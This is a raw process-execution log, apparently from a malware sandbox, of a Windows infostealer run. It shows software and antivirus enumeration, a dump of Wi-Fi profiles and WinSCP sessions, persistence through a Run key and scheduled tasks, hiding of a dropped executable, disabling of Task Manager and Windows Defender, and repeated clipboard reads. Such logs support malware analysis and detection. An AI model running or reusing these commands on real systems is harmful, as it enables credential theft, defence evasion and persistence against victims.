C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function Get-AntiVirusProduct {

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe""

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x508 0x51c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

